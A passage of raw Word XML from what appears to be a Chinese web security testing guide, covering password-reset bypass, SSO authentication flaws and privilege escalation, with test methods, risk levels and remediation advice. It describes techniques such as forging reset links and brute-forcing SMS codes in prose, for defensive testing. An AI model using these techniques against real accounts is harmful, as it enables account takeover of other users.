          <w:snapToGrid w:val="0"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
          <w:snapToGrid w:val="0"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
          <w:snapToGrid w:val="0"/>
        </w:rPr>
        <w:t>）。在得知他人邮箱的情况下，构造重置他人密码的链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E943D" w14:textId="61B66BB0" w:rsidR="00307FF6" w:rsidRPr="004D55A1" w:rsidRDefault="00307FF6" w:rsidP="004D55A1">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:before="78"/>
        <w:ind w:left="0" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
          <w:snapToGrid w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在得知他人手机号的情况下，通过穷举手机验证码重置他人的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF35B15" w14:textId="77777777" w:rsidR="00CA60AC" w:rsidRPr="004D55A1" w:rsidRDefault="00C24790" w:rsidP="004D55A1">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00AF5A8B" w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60083D46" w14:textId="71FA3773" w:rsidR="00CA60AC" w:rsidRPr="004D55A1" w:rsidRDefault="008E74B4" w:rsidP="004D55A1">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码修改功能常采用分步骤方式来实现，攻击者在未知原始密码的情况下绕过某些检验步骤修改用户密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5E55C4" w14:textId="37239AB8" w:rsidR="00AF5A8B" w:rsidRPr="004D55A1" w:rsidRDefault="00307FF6" w:rsidP="004D55A1">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重置密码过程一般是首先验证注册的邮箱或者手机号，获取重置密码的链接（一般会包含一串唯一的字符串）或者验证码，然后访问重置密码链接或者输入验证码，最后输入新密码。密码重置机制绕过攻击是指在未知他人的重置密码链接或手机验证码的情况下，通过构造重置密码链接或穷举手机验证码的方式直接重置他人的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D3B17" w14:textId="77777777" w:rsidR="00AF5A8B"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA090A4" w14:textId="74C40C75" w:rsidR="00AF5A8B" w:rsidRPr="004D55A1" w:rsidRDefault="005B5321" w:rsidP="004D55A1">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：其它用户的密码被修改</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重置成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD9884B" w14:textId="77777777" w:rsidR="00AF5A8B"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D170444" w14:textId="77777777" w:rsidR="003617A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rPr>
        <w:t>一次性填写校验信息</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（原始密码、新密码等）后再提交修改</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>密码请求</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170B5542" w14:textId="77777777" w:rsidR="003617A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hint="eastAsia"/>
        </w:rPr>
        <w:t>对客户端提交的修改密码请求，应对请求的用户身份与当前登录的用户身份进行校验，判断是否有权修改用户的密码并对原始密码是否正确也进行判断。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D2936E" w14:textId="77777777" w:rsidR="003617A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hint="eastAsia"/>
        </w:rPr>
        <w:t>不应将用于接收验证信息的手机、邮箱等信息全部明文传到客户端，应对手机、邮箱等信息进行屏蔽处理，或不将此类信息返回到客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C613D23" w14:textId="77777777" w:rsidR="0006041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hint="eastAsia"/>
        </w:rPr>
        <w:t>对原始密码进行了验证的情况下，限制输入原始密码的错误次数，防止攻击者暴力破解原始密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E7F3C" w14:textId="1CD62E2B" w:rsidR="00AF5A8B" w:rsidRDefault="00060416" w:rsidP="004D55A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>重置密码链接中的关键信息应随机化</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>不可预测</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制），且禁止将关键信息返回到客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53061201" w14:textId="6D850C50" w:rsidR="00EF7E10" w:rsidRPr="004D55A1" w:rsidRDefault="00EF7E10" w:rsidP="00EF7E10">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E740067" w14:textId="0C03AAE6" w:rsidR="00AF5A8B" w:rsidRPr="00F757E4" w:rsidRDefault="00AF5A8B" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc498434546"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SSO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证缺陷</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="08B98784" w14:textId="66AD3F4F" w:rsidR="00AF5A8B"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00442E76" w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSO</w:t>
      </w:r>
      <w:r w:rsidR="00442E76" w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证存在缺陷，可越权登录他人账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50907857" w14:textId="626AAC9A" w:rsidR="00AF5A8B"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00667477" w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议从以下两</w:t>
      </w:r>
      <w:r w:rsidR="00166737" w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个方向进行测试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47857FA3" w14:textId="286AC6F3" w:rsidR="00166737" w:rsidRPr="005D2354" w:rsidRDefault="00166737" w:rsidP="005D2354">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息传输缺乏安全保证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E6601" w14:textId="4AEAAA83" w:rsidR="00166737" w:rsidRPr="005D2354" w:rsidRDefault="00D44579" w:rsidP="005D2354">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSO</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidR="00166737" w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信过程中大多数采用明文形式传送敏感信息，这些信息很容易被窃取，致使重要信息泄露。另外，在通信过程中大多数方案也没有对关键信息进行签名，容易遭到伪装攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771C33BD" w14:textId="4BA42BAB" w:rsidR="00166737" w:rsidRPr="005D2354" w:rsidRDefault="00166737" w:rsidP="005D2354">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的安全缺陷</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516593F2" w14:textId="720E0FD1" w:rsidR="00AF5A8B" w:rsidRPr="005D2354" w:rsidRDefault="00166737" w:rsidP="005D2354">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于单点登录基本上是基于</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务实现的，所以</w:t>
      </w:r>
      <w:r w:rsidR="00D44579" w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也不可避免的存在</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00D44579" w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的安全缺陷</w:t>
      </w:r>
      <w:r w:rsidR="003D2287" w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如跨站脚本攻击、越权攻击等</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA4E5A1" w14:textId="3B2D0035" w:rsidR="00AF5A8B" w:rsidRPr="005D2354" w:rsidRDefault="00C24790" w:rsidP="005D2354">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00AF5A8B" w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00226975" w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为只需要登录一次，所有的授权的应用系统都可以访问，可能导致一些很重要的信息泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030A2723" w14:textId="77777777" w:rsidR="00AF5A8B"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378C0E6E" w14:textId="7071DF5B" w:rsidR="00AF5A8B" w:rsidRPr="005D2354" w:rsidRDefault="00442E76" w:rsidP="005D2354">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：可导致用户在单点登录之后任意登录其他系统和其他用户账号信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AEA191" w14:textId="3F43E324" w:rsidR="007176A5"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修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="007176A5" w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议从以下几个方面进行防御：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13126BF5" w14:textId="0AE467DB" w:rsidR="00AF5A8B" w:rsidRPr="005D2354" w:rsidRDefault="007176A5" w:rsidP="005D2354">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议在不影响业务的前提下，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议传输</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F1F567" w14:textId="544636CA" w:rsidR="007176A5" w:rsidRPr="005D2354" w:rsidRDefault="007176A5" w:rsidP="005D2354">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>严格校验</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSO</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证过程中的用户身份</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C43FE4" w14:textId="462363E9" w:rsidR="00AF5A8B" w:rsidRDefault="007176A5" w:rsidP="005D2354">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤用户传入的参数，对特殊符号进行转义或屏蔽。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4316F3DA" w14:textId="538405FD" w:rsidR="00713863" w:rsidRPr="001D46CD" w:rsidRDefault="00EF7E10" w:rsidP="001D46CD">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5E6741D" w14:textId="57563194" w:rsidR="00BF1927" w:rsidRPr="00F757E4" w:rsidRDefault="00444FC8" w:rsidP="00BF1927">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc498434547"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>越权</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="35A3A90D" w14:textId="01D870ED" w:rsidR="00AF5A8B" w:rsidRPr="00E10396" w:rsidRDefault="00C0460B" w:rsidP="00C0460B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2354">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="002F72C0" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>越权访问，这类漏洞是指应用在检查授权（</w:t>
      </w:r>
      <w:r w:rsidR="002F72C0" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r w:rsidR="002F72C0" w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）时存在纰漏，使得攻击者在获得低权限用户帐后后，可以利用一些方式绕过权限检查，访问或者操作到原本无权访问的高权限功能。在实际的代码安全审查中，这类漏洞往往很难通过工具进行自动化检测，因此在实际应用中危害很大。其与未授权访问有一定差别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629919E2" w14:textId="77777777" w:rsidR="00AF5A8B" w:rsidRPr="00E10396" w:rsidRDefault="00AF5A8B" w:rsidP="00E10396">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D6581" w14:textId="77777777" w:rsidR="0049292D" w:rsidRPr="00E10396" w:rsidRDefault="0049292D" w:rsidP="00E10396">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以超管</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10396">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
